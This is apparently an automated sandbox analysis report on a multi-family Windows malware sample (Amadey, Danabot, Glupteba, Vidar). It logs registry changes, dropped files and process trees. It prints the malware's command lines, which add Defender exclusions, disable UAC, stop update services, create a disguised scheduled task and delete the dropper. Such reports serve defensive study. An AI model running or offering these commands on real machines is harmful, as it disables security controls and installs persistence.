Malware Analysis Report

2025-01-02 09:11

Sample ID 231005-d8qlpsad54
Target 221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3
SHA256 221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3
Tags
amadey danabot fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 banker dropper evasion loader spyware stealer trojan upx discovery persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3

Threat Level: Known bad

The file 221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3 was found to be: Known bad.

Malicious Activity Summary

UAC bypass

Danabot

Glupteba payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Glupteba

Detect Fabookie payload

Amadey

Vidar

Fabookie

Windows security bypass

Modifies boot configuration data using bcdedit

Stops running service(s)

Blocklisted process makes network request

Drops file in Drivers directory

Possible attempt to disable PatchGuard

Downloads MZ/PE file

Modifies Windows Firewall

UPX packed file

Windows security modification

Loads dropped DLL

Drops startup file

Executes dropped EXE

Reads user/profile data of web browsers

.NET Reactor protector

Checks whether UAC is enabled

Accesses 2FA software files, possible credential harvesting

Adds Run key to start application

Enumerates connected drives

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Program crash

System policy modification

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Checks processor information in registry

Modifies system certificate store

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-05 03:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-05 03:40

Reported

2023-10-05 03:46

Platform

win7-20230831-en

Max time kernel

20s

Max time network

302s

Command Line

"C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe"

Signatures

Amadey

trojan amadey

Danabot

trojan banker danabot

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Vidar

stealer vidar

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HNXwBF1hWslJi8uXn3hEZDNL.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yVhC6QKXjp86FwxFdU9kzyjO.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SEUjB2J9wSwNiMjokJDtWYV5.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sN0jqm02yfCiV6GzOoRNtToS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ojPHJWHZIjyrT0ueHRYvlxa8.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3A3zOMdIgnzUrG6F4oeXkHis.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zro8vMFJk8zSWliDKXwJG5Bi.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VXDtgdslF8HsYq7z546uKbP9.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F8kiFSfW5GvjyrhmHWJy8hkf.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nnb5hRbvjuyD097a85PnWOe2.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIvQbtjdgb7bzfXT78BbK3yA.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2408 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2408 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1812 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe
PID 1812 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe
PID 1812 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe
PID 1812 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 1980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe
PID 1812 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe
PID 1812 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe
PID 1812 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe
PID 1812 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe
PID 1812 wrote to memory of 2800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe
PID 1812 wrote to memory of 2800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe
PID 1812 wrote to memory of 2800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe
PID 1812 wrote to memory of 2800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe
PID 1812 wrote to memory of 1496 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe
PID 1812 wrote to memory of 1496 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe
PID 1812 wrote to memory of 1496 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe
PID 1812 wrote to memory of 1496 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe
PID 1812 wrote to memory of 320 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe
PID 1812 wrote to memory of 320 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe
PID 1812 wrote to memory of 320 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe
PID 1812 wrote to memory of 320 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe
PID 1812 wrote to memory of 2172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe
PID 1812 wrote to memory of 2172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe
PID 1812 wrote to memory of 2172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe
PID 1812 wrote to memory of 2172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 1812 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe
PID 776 wrote to memory of 1508 N/A C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 776 wrote to memory of 1508 N/A C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 776 wrote to memory of 1508 N/A C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 776 wrote to memory of 1508 N/A C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1400 wrote to memory of 868 N/A C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp
PID 1400 wrote to memory of 868 N/A C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp
PID 1400 wrote to memory of 868 N/A C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp
PID 1400 wrote to memory of 868 N/A C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp
PID 1400 wrote to memory of 868 N/A C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp
PID 1400 wrote to memory of 868 N/A C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe

"C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe

"C:\Users\Admin\Pictures\WTnySbBiXEPgUd6av1auD9t8.exe"

C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe

"C:\Users\Admin\Pictures\VsBiRXrkIcptkeyANambvvrX.exe" --silent --allusers=0

C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe

"C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe"

C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe

"C:\Users\Admin\Pictures\Mxftz2zy43NjDk3Yx8kPQa4n.exe"

C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe

"C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe"

C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe

"C:\Users\Admin\Pictures\CIHZo3JMT8sejUAgKkyAs4ld.exe"

C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe

"C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe"

C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe

"C:\Users\Admin\Pictures\Gz8lAFmhpEYKA9kH1FwuTnTh.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp

"C:\Users\Admin\AppData\Local\Temp\is-J3FB5.tmp\3Eymw9ybTv5KGhN7eGSjtWsF.tmp" /SL5="$60162,491750,408064,C:\Users\Admin\Pictures\3Eymw9ybTv5KGhN7eGSjtWsF.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\rVbSDBNUf2JPUOzwsmWVmhvc.exe

"C:\Users\Admin\Pictures\rVbSDBNUf2JPUOzwsmWVmhvc.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\Pictures\h15Hs6ewA8wDxuAPG7SwUvHx.exe

"C:\Users\Admin\Pictures\h15Hs6ewA8wDxuAPG7SwUvHx.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\is-R4Q61.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-R4Q61.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\8259092891.exe"

C:\Users\Admin\AppData\Local\Temp\8259092891.exe

"C:\Users\Admin\AppData\Local\Temp\8259092891.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Ti7BaeU3IDoi3JgxcuwS4XBO.exe" /f & erase "C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

